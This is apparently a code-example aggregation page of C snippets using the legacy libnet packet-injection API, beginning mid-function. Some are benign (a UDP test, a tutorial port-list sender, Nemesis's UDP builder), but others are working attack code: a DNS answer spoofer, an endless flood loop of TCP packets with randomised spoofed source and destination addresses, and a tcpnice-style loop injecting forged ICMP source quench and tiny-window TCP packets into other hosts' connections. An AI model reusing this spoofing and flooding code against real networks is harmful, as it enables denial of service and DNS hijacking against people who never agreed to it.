    packet_size = chewycenter.payload_size + LIBNET_IP_H + LIBNET_UDP_H + LIBNET_DNS_H;

    libnet_init_packet(packet_size, &packet);
    if (packet == NULL) {
        libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
        return;
    }

    /*
     *  ip header construction
     *  source and destination are swapped here because we are spoofing a reply
     */

    libnet_build_ip(LIBNET_UDP_H + LIBNET_DNS_H,
            0,                                   /* ip tos              */
            0,                                   /* ip id               */
            0,                                   /* fragmentation bits  */
            64,                                  /* ttl                 */
            IPPROTO_UDP,                         /* protocol            */
            chewycenter.dst_address,             /* source address      */
            chewycenter.src_address,             /* destination address */
            NULL,                                /* payload             */
            0,                                   /* payload length      */
            packet);                             /* packet buffer       */

     /*
      *  udp header construction
      *  source and destination ports are swapped here too
      *
      * during debugging i found that we weren't generating the correct
      * length here, that is why a payload length is included (payload + dns_header)
      * although, from what i know, it really shouldn't be here
      */

    libnet_build_udp(53,                         /* source port      */
            ntohs(chewycenter.src_port),         /* destination port */
            NULL,                                /* payload          */
            chewycenter.payload_size + 12,       /* payload length   */
            packet + LIBNET_IP_H);

    /*
     *  dns header construction
     */

    libnet_build_dns(ntohs(chewycenter.dns_id),  /* dns id                      */
            0x8580,                              /* control flags (QR,AA,RD,RA) */
            1,                                   /* number of questions         */
            1,                                   /* number of answer RR's       */
            0,                                   /* number of authority  RR's   */
            0,                                   /* number of additional RR's   */
            chewycenter.payload,                 /* payload                     */
            chewycenter.payload_size,            /* payload length              */
            packet + LIBNET_IP_H + LIBNET_UDP_H);

    /*
     *  calculate checksum
     */

    libnet_do_checksum (packet, IPPROTO_UDP, packet_size - LIBNET_IP_H);

    /*
     *  write packet
     */

    written_bytes = libnet_write_ip(socket, packet, packet_size);

    /*
     *  make sure the number of written bytes jives with what we expect
     */

    if (written_bytes < packet_size)    {
        printf("\nwarning:             ");
        libnet_error(LN_ERR_WARNING, "libnet only wrote %d of %d bytes", written_bytes, packet_size);
        printf("\n--");
    }

    /*
     *  we're done with this packet
     */

    libnet_destroy_packet(&packet);

    /*
     *  announce what we've just done
     *  remember that we've swapped the addresses/ports
     */

    src.s_addr = chewycenter.src_address;
    dst.s_addr = chewycenter.dst_address;

    printf("\nspoofing answer:     %s:%d > ", inet_ntoa(dst), ntohs(chewycenter.dst_port));
    printf("%s:%d",                           inet_ntoa(src), ntohs(chewycenter.src_port));

    printf("\t[%s = %s]", chewycenter.current_question, chewycenter.current_answer);

    #if defined DEBUG
        printf("\nDEBUG>\n payload: [%d]", chewycenter.payload_size);
        for (i = 0; i < 52; i++)
            printf("%x ", chewycenter.payload[i]);
        printf("\n");
    #endif

    printf("\n--");

    if (oflag)  {

    }
}
Ejemplo n.º 25
0
Archivo: udp.c Proyecto: ebichu/dd-wrt
int
main(int argc, char **argv)
{
    int sock, c;
    u_long src_ip, dst_ip;
    u_short src_prt, dst_prt;
    u_char *cp, *buf;

    printf("UDP packet building/writing test\n");

    src_ip  = 0;
    dst_ip  = 0;
    src_prt = 0;
    dst_prt = 0;
    while((c = getopt(argc, argv, "d:s:")) != EOF)
    {
        switch (c)
        {
            /*
             *  We expect the input to be of the form `ip.ip.ip.ip.port`.  We
             *  point cp to the last dot of the IP address/port string and
             *  then seperate them with a NULL byte.  The optarg now points to
             *  just the IP address, and cp points to the port.
             */
            case 'd':
                if (!(cp = strrchr(optarg, '.')))
                {
                    usage(argv[0]);
                }
                *cp++ = 0;
                dst_prt = (u_short)atoi(cp);
                if (!(dst_ip = libnet_name_resolve(optarg, 1)))
                {
                    fprintf(stderr, "Bad destination IP address: %s\n", optarg);
                    exit(1);
                }
                break;
            case 's':
                if (!(cp = strrchr(optarg, '.')))
                {
                    usage(argv[0]);
                }
                *cp++ = 0;
                src_prt = (u_short)atoi(cp);
                if (!(src_ip = libnet_name_resolve(optarg, 1)))
                {
                    fprintf(stderr, "Bad source IP address: %s\n", optarg);
                    exit(1);
                }
                break;
        }
    }
    if (!src_ip || !src_prt || !dst_ip || !dst_prt)
    {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }

    buf = malloc(LIBNET_UDP_H + LIBNET_IP_H);
    if (!buf)
    {
        perror("No memory for packet header");
        exit(EXIT_FAILURE);
    }

    sock = libnet_open_raw_sock(IPPROTO_RAW);
    if (sock == -1)
    {
        perror("No socket");
        exit(EXIT_FAILURE);
    }
    
    libnet_build_ip(LIBNET_UDP_H,
            0,
            242,
            0,
            64,
            IPPROTO_UDP,
            src_ip,
            dst_ip,
            NULL,
            0,
            buf);

    libnet_build_udp(src_prt, dst_prt, NULL, 0, buf + LIBNET_IP_H);

    libnet_do_checksum(buf, IPPROTO_UDP, LIBNET_UDP_H);

    c = libnet_write_ip(sock, buf, LIBNET_UDP_H + LIBNET_IP_H);
    if (c < LIBNET_UDP_H + LIBNET_IP_H)
    {
        fprintf(stderr, "libnet_write_ip\n");
    }
    printf("Completed, wrote %d bytes\n", c);

    free(buf);

    return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
Ejemplo n.º 26
0
int
main(int argc, char *argv[])
{
    int packet_size,                    /* size of our packet */
        payload_size,                   /* size of our packet */
        c;                              /* misc */
    u_long src_ip, dst_ip;              /* source ip, dest ip */
    u_short bport, eport;               /* beginning and end ports */
    u_short cport;                      /* current port */
    u_char payload[MAX_PAYLOAD_SIZE];   /* packet payload */
    u_char *packet;                     /* pointer to our packet buffer */
    char err_buf[LIBNET_ERRBUF_SIZE];   /* error buffer */
    u_char *device;                     /* pointer to the device to use */
    struct libnet_link_int *network;    /* pointer to link interface struct */
    struct libnet_plist_chain plist;    /* plist chain */
    struct libnet_plist_chain *plist_p; /* plist chain pointer */

    printf("libnet example code:\tmodule 4\n\n");
    printf("packet injection interface:\tlink layer\n");
    printf("packet type:\t\t\tUDP [with payload] using port list chaining\n");

    plist_p = NULL;
    device = NULL;
    src_ip = 0;
    dst_ip = 0;

    while ((c = getopt(argc, argv, "i:d:s:p:")) != EOF)
    {
        switch (c)
        {
            case 'd':
                if (!(dst_ip = libnet_name_resolve(optarg, LIBNET_RESOLVE)))
                {
                    libnet_error(LIBNET_ERR_FATAL,
                            "Bad destination IP address: %s\n", optarg);

                }
                break;
            case 'i':
                device = optarg;
                break;
            case 's':
                if (!(src_ip = libnet_name_resolve(optarg, LIBNET_RESOLVE)))
                {
                    libnet_error(LIBNET_ERR_FATAL,
                            "Bad source IP address: %s\n", optarg);
                }
                break;
            case 'p':
                plist_p = &plist;
                if (libnet_plist_chain_new(&plist_p, optarg) == -1)
                {
                    libnet_error(LIBNET_ERR_FATAL, "Could not build port list\n");
                }
                break;
            default:
                usage(argv[0]);
                exit(EXIT_FAILURE);
        }
    }

    if (!src_ip || !dst_ip || !plist_p)
    {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }

    c = argc - optind;
    if (c != 1)
    {
        usage(argv[0]);
        exit(EXIT_FAILURE);
    }
    memset(payload, 0, sizeof(payload));
    strncpy(payload, argv[optind], strlen(argv[optind]));


    /*
     *  Step 1: Network Initialization (interchangable with step 2).
     */
    if (device == NULL)
    {
        struct sockaddr_in sin;
        /*
         *  Try to locate a device.
         */
        if (libnet_select_device(&sin, &device, err_buf) == -1)
        {
            libnet_error(LIBNET_ERR_FATAL, "libnet_select_device failed: %s\n", err_buf);
        }
        printf("device:\t\t\t\t%s\n", device);
    }
    if ((network = libnet_open_link_interface(device, err_buf)) == NULL)
    {
        libnet_error(LIBNET_ERR_FATAL, "libnet_open_link_interface: %s\n", err_buf);
    }

    /*
     *  Get the payload from the user.  Hrm.  This might fail on a Sparc
     *  if byte alignment is off...
     */
    payload_size = strlen(payload);

    /*
     *  We're going to build a UDP packet with a payload using the
     *  link-layer API, so this time we need memory for a ethernet header
     *  as well as memory for the ICMP and IP headers and our payload.
     */
    packet_size = LIBNET_IP_H + LIBNET_ETH_H + LIBNET_UDP_H + payload_size;

    /*
     *  Step 2: Memory Initialization (interchangable with step 1).
     */
    if (libnet_init_packet(packet_size, &packet) == -1)
    {
        libnet_error(LIBNET_ERR_FATAL, "libnet_init_packet failed\n");
    }


    /*
     *  Step 3: Packet construction (ethernet header).
     */
    libnet_build_ethernet(enet_dst,
            enet_src,
            ETHERTYPE_IP,
            NULL,
            0,
            packet);

    /*
     *  Step 3: Packet construction (IP header).
     */
    libnet_build_ip(LIBNET_UDP_H + payload_size,
            0,                      /* IP tos */
            242,                    /* IP ID */
            0,                      /* Frag */
            64,                     /* TTL */
            IPPROTO_UDP,            /* Transport protocol */
            src_ip,                 /* Source IP */
            dst_ip,                 /* Destination IP */
            NULL,                   /* Pointer to payload (none) */
            0,
            packet + LIBNET_ETH_H); /* Packet header memory */


    while (libnet_plist_chain_next_pair(plist_p, &bport, &eport))
    {
        while (!(bport > eport) && bport != 0)
        {
            cport = bport++;
            /*
             *  Step 3: Packet construction (UDP header).
             */
            libnet_build_udp(242,           /* source port */
                    cport,                  /* dest. port */
                    payload,                /* payload */ 
                    payload_size,           /* payload length */ 
                    packet + LIBNET_ETH_H + LIBNET_IP_H);

            /*
             *  Step 4: Packet checksums (ICMP header *AND* IP header).
             */
            if (libnet_do_checksum(packet + ETH_H, IPPROTO_UDP, LIBNET_UDP_H + payload_size) == -1)
            {
                libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
            }
            if (libnet_do_checksum(packet + ETH_H, IPPROTO_IP, LIBNET_IP_H) == -1)
            {
                libnet_error(LIBNET_ERR_FATAL, "libnet_do_checksum failed\n");
            }

            /*
             *  Step 5: Packet injection.
             */
            c = libnet_write_link_layer(network, device, packet, packet_size);
            if (c < packet_size)
            {
                libnet_error(LN_ERR_WARNING, "libnet_write_link_layer only wrote %d bytes\n", c);
            }
            else
            {
                printf("construction and injection completed, wrote all %d bytes, port %d\n", c, cport);
            }
        }
    }
    /*
     *  Shut down the interface.
     */
    if (libnet_close_link_interface(network) == -1)
    {   
        libnet_error(LN_ERR_WARNING, "libnet_close_link_interface couldn't close the interface");
    }


    /*
     *  Free packet memory.
     */
    libnet_destroy_packet(&packet);

    return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
Ejemplo n.º 27
0
int
main(int argc, char **argv)
{

    int sock, n, c, r, p_num;
    struct libnet_arena arena, *arena_p;
    u_char *packets[10];
    u_char *payload;
    u_char *buf;
    u_long src_ip, dst_ip;
    
    src_ip = 0;
    dst_ip = 0;
    payload = NULL;

    while((c = getopt(argc, argv, "d:s:p:")) != EOF)
    {
        switch (c)
        {
            case 'd':
                if (!(dst_ip = libnet_name_resolve(optarg, 1))) {
                    fprintf(stderr, "Bad destination IP address: %s\n", optarg);
                    exit(1);
                }
                break;

            case 's':
                if (!(src_ip = libnet_name_resolve(optarg, 1))) {
                    fprintf(stderr, "Bad source IP address: %s\n", optarg);
                    exit(-1);
                }
                break;

            case 'p':
                payload = optarg;
                break;
            
            default:
                usage();
                exit(-1);
        }
    }

    if (!src_ip || !dst_ip || !payload) {
        usage();
        exit(-1);
    }

    /* allocate packet memory */
    buf = (u_char *)malloc(LIBNET_IP_H + LIBNET_ICMP_H + strlen(payload));
    if(!buf) {
        perror("malloc:");
        exit(-1);
    }
    
    sock = libnet_open_raw_sock(IPPROTO_RAW);
    if (sock == -1) {
        perror("No socket");
        exit(-1);
    }
   
    /* build headers */ 
    libnet_build_ip(LIBNET_ICMP_ECHO_H, IPTOS_LOWDELAY | IPTOS_THROUGHPUT,  
        TPING_ID,  0, TPING_TTL, IPPROTO_ICMP, src_ip, dst_ip, NULL, 0, buf);

    libnet_build_icmp_echo(ICMP_ECHO, 0, TPING_ID, 1, payload,strlen(payload),
                buf + LIBNET_IP_H);
 

    if (libnet_do_checksum(buf, IPPROTO_ICMP, LIBNET_ICMP_ECHO_H) < 0) {
        fprintf(stderr, "Can't do checksum!\n");
    }

    /*
    *  Write the packet to the network.
    */
    r = libnet_write_ip(sock, buf, LIBNET_ICMP_ECHO_H + LIBNET_IP_H + strlen(payload));
    if (r < LIBNET_ICMP_ECHO_H + LIBNET_IP_H + strlen(payload)) {
        fprintf(stderr, "Unable to send packet.\n");
    }

    printf("ICMP Echo sent. Payload: %s\n",payload);

}
Ejemplo n.º 28
0
int buildudp(ETHERhdr *eth, IPhdr *ip, UDPhdr *udp, FileData *pd, 
        FileData *ipod, char *device)
{
    int n;
    u_int32_t udp_packetlen = 0, udp_meta_packetlen = 0;
    static u_int8_t *pkt;
    static int sockfd = -1;
    struct libnet_link_int *l2 = NULL;
    u_int8_t link_offset = 0;
#if !defined(WIN32)
    int sockbuff = IP_MAXPACKET;
#endif

    if (pd->file_mem == NULL)
        pd->file_s = 0;
    if (ipod->file_mem == NULL)
        ipod->file_s = 0;

    if (got_link)   /* data link layer transport */
    {
        if ((l2 = libnet_open_link_interface(device, errbuf)) == NULL)
        {
            nemesis_device_failure(INJECTION_LINK, (const char *)device);
            return -1;
        }
        link_offset = LIBNET_ETH_H;
    }
    else
    {
        if ((sockfd = libnet_open_raw_sock(IPPROTO_RAW)) < 0)
        {
            nemesis_device_failure(INJECTION_RAW, (const char *)NULL);
            return -1;
        }
#if !defined(WIN32)
        if ((setsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, (const void *)&sockbuff, 
                sizeof(sockbuff))) < 0)
        {
            fprintf(stderr, "ERROR: setsockopt() failed.\n");
            return -1;
        }
#endif
    }

    udp_packetlen = link_offset + LIBNET_IP_H + LIBNET_UDP_H + pd->file_s + 
            ipod->file_s;

    udp_meta_packetlen = udp_packetlen - (link_offset + LIBNET_IP_H);

#ifdef DEBUG
    printf("DEBUG: UDP packet length %u.\n", udp_packetlen);
    printf("DEBUG:  IP options size  %u.\n", ipod->file_s);
    printf("DEBUG: UDP payload size  %u.\n", pd->file_s);
#endif

    if (libnet_init_packet(udp_packetlen, &pkt) == -1)
    {
        fprintf(stderr, "ERROR: Unable to allocate packet memory.\n");
        return -1;
    }

    if (got_link)
        libnet_build_ethernet(eth->ether_dhost, eth->ether_shost, ETHERTYPE_IP,
                NULL, 0, pkt);

    libnet_build_ip(udp_meta_packetlen, ip->ip_tos, ip->ip_id, ip->ip_off, 
            ip->ip_ttl, ip->ip_p, ip->ip_src.s_addr, ip->ip_dst.s_addr, 
            NULL, 0, pkt + link_offset);

    libnet_build_udp(udp->uh_sport, udp->uh_dport, pd->file_mem, 
            pd->file_s, pkt + link_offset + LIBNET_IP_H);

    if (got_ipoptions)
    {
        if ((libnet_insert_ipo((struct ipoption *)ipod->file_mem, 
                ipod->file_s, pkt + link_offset)) == -1)
        {
            fprintf(stderr, "ERROR: Unable to add IP options, discarding "
                    "them.\n");
        }
    }

    if (got_link)
        libnet_do_checksum(pkt + LIBNET_ETH_H, IPPROTO_IP, LIBNET_IP_H + 
                ipod->file_s);

    libnet_do_checksum(pkt + link_offset, IPPROTO_UDP, LIBNET_UDP_H + 
            pd->file_s + ipod->file_s);

    if (got_link)
        n = libnet_write_link_layer(l2, device, pkt, udp_packetlen);
    else
        n = libnet_write_ip(sockfd, pkt, udp_packetlen);

    if (verbose == 2)
        nemesis_hexdump(pkt, udp_packetlen, HEX_ASCII_DECODE);
    if (verbose == 3)
        nemesis_hexdump(pkt, udp_packetlen, HEX_RAW_DECODE);

    if (n != udp_packetlen)
    {
        fprintf(stderr, "ERROR: Incomplete packet injection.  Only wrote "
                "%d bytes.\n", n);
    }
    else
    {
        if (verbose)
        {
            if (got_link)
                printf("Wrote %d byte UDP packet through linktype %s.\n", n, 
                        nemesis_lookup_linktype(l2->linktype));
            else
                printf("Wrote %d byte UDP packet.\n", n);
        }
    }
    libnet_destroy_packet(&pkt);
    if (got_link)
        libnet_close_link_interface(l2);
    else
        libnet_close_raw_sock(sockfd);
    return n;
}
Ejemplo n.º 29
0
int
main (int argc, char *argv[])
{
  int i, loop;
  /* no payload yet */
  int size = LIBNET_PACKET;

  opt.seqn = opt.ackn = opt.flags = 0;
  opt.dport = opt.sport = opt.frag = 0;
  opt.ttl = 255;
  opt.winsize = 16384;
  opt.tos = 0x08;


  signal (SIGINT, (void (*)()) abort);

  srand (time (NULL) + getpid ());
  srandom (time (NULL) + getpid ());

  banner ();

  parse_args (argc, argv);

  if (!whocares)
    {
      if (!local)
	{
	  if (!(opt.dst = libnet_name_resolve (dsthost, LIBNET_RESOLVE)))
	    {
	      libnet_error (LIBNET_ERR_FATAL,
			":: invalid destination IP address: %s\n", dsthost);
	      exit (1);
	    }
	  printf (":: destination host - %s\n", dsthost);
	}
      else
	printf (":: destination host - local\n");
    }
  else
    printf (":: destination host - whocares\n");

  printf (":: destination port(s)");
  for (i = 1; i < ports + 1; i++)
    printf (" - %d", portarray[i]);
  printf ("\n");

  if (libnet_init_packet (size, &packet) == NULL)
    {
      libnet_error (LIBNET_ERR_FATAL,
		    ":: libnet_init_packet failed\n");
    }
  if ((s = libnet_open_raw_sock (IPPROTO_RAW)) == -1)
    {
      libnet_error (LIBNET_ERR_FATAL, ":: cannot open socket.\n");
    }
  printf (":: spanking...\n");
  printf (":: press ^C to end...\n");
  for (;;)
    {
      for (i = 1; i < ports + 1; i++)
	{
	  if (whocares)
	    change2 = random () & 01;
	  if (ismult)
	    {
	      opt.src = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254);
	      if (local)
		opt.dst = ((224 + rand () % 239) << 24) + (0 << 16) + (0 << 8) + (rand () % 5);
	      else
		{
		  if (change2)
		    opt.dst = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254);
		  else
		    opt.dst = rand ();
		}
	    }
	  else
	    {
	      opt.src = rand ();
	      if (local)
		opt.dst = ((224 + rand () % 239) << 24) + (0 << 16) + (0 << 8) + (rand () % 5);
	      else
		{
		  if (change2)
		    opt.dst = ((224 + rand () % 239) << 24) + ((rand () % 254) << 16) + ((rand () % 254) << 8) + (rand () % 254);
		  else
		    opt.dst = rand ();
		}
	    }

	  if (isrand)
	    {
	      loop = rand () % 5;
	      for (i = 0; i <= loop; i++)
		opt.flags |= flag_array[rand () % 5];

	      opt.frag = frag_array[rand () % 3];
	      opt.ackn = random ();
	      opt.sport = 1024 + rand () % 32000;
	      opt.tos = tos_array[rand () % 3];
	      opt.ttl = rand () % 255;
	      opt.winsize = rand () % 32000;
	      if (change)
		ismult = random () & 01;
	    }
	  opt.ident = random ();
	  opt.seqn = random ();
	  if (!stream)
	    opt.ackn = random ();

	  if (portarray[i] == 0)
	    opt.dport = rand () % 1024;
	  else
	    opt.dport = portarray[i];

	  libnet_build_ip (TCP_H, opt.tos, opt.ident, opt.frag, opt.ttl, IPPROTO_TCP, opt.src, opt.dst, NULL, 0, packet);

	  libnet_build_tcp (opt.sport, opt.dport, opt.seqn, opt.ackn, opt.flags, opt.winsize, 0, NULL, 0, packet + IP_H);

	  if (libnet_do_checksum (packet, IPPROTO_TCP, TCP_H) == -1)
	    {
	      libnet_error (LIBNET_ERR_FATAL, ":: libnet_do_checksum failed\n");
	    }
	  libnet_write_ip (s, packet, size);
	}
    }
  return 1;
}
Ejemplo n.º 30
0
void
tcp_nice_loop(pcap_t *pd, int sock)
{
	struct pcap_pkthdr pkthdr;
	struct libnet_ip_hdr *ip;
	struct libnet_tcp_hdr *tcp;
	struct libnet_icmp_hdr *icmp;
	u_char *pkt, buf[IP_H + ICMP_ECHO_H + 128];
	int len, nice;
	
	libnet_seed_prand();
	
	nice = 160 / Opt_nice;
	
	for (;;) {
		if ((pkt = (char *)pcap_next(pd, &pkthdr)) != NULL) {
			ip = (struct libnet_ip_hdr *)(pkt + pcap_off);
			if (ip->ip_p != IPPROTO_TCP) continue;
			
			tcp = (struct libnet_tcp_hdr *)
				((u_char *)ip + (ip->ip_hl * 4));
			if (tcp->th_flags & (TH_SYN|TH_FIN|TH_RST) ||
			    ntohs(tcp->th_win) == nice)
				continue;
			
			if (Opt_icmp) {
				/* Send ICMP source quench. */
				len = (ip->ip_hl * 4) + 8;
				libnet_build_ip(ICMP_ECHO_H + len, 0,
						libnet_get_prand(PRu16),
						0, 64, IPPROTO_ICMP,
						ip->ip_dst.s_addr,
						ip->ip_src.s_addr,
						NULL, 0, buf);
				
				icmp = (struct libnet_icmp_hdr *)(buf + IP_H);
				icmp->icmp_type = 4;
				icmp->icmp_code = 0;
				memcpy((u_char *)icmp + ICMP_ECHO_H,
				       (u_char *)ip, len);
				
				libnet_do_checksum(buf, IPPROTO_ICMP,
						   ICMP_ECHO_H + len);

				len += (IP_H + ICMP_ECHO_H);

				if (libnet_write_ip(sock, buf, len) != len)
					warn("write");

				fprintf(stderr, "%s > %s: icmp: source quench\n",
				     libnet_host_lookup(ip->ip_dst.s_addr, 0),
				     libnet_host_lookup(ip->ip_src.s_addr, 0));
			}
			/* Send tiny window advertisement. */
			ip->ip_hl = 5;
			ip->ip_len = htons(IP_H + TCP_H);
			ip->ip_id = libnet_get_prand(PRu16);
			memcpy(buf, (u_char *)ip, IP_H);
			
			tcp->th_off = 5;
			tcp->th_win = htons(nice);
			memcpy(buf + IP_H, (u_char *)tcp, TCP_H);
			
			libnet_do_checksum(buf, IPPROTO_TCP, TCP_H);

			len = IP_H + TCP_H;

			if (libnet_write_ip(sock, buf, len) != len)
				warn("write");

			fprintf(stderr, "%s:%d > %s:%d: . ack %u win %d\n",
				libnet_host_lookup(ip->ip_src.s_addr, 0),
				ntohs(tcp->th_sport),
				libnet_host_lookup(ip->ip_dst.s_addr, 0),
				ntohs(tcp->th_dport),
				ntohl(tcp->th_ack), nice);
		}
	}
}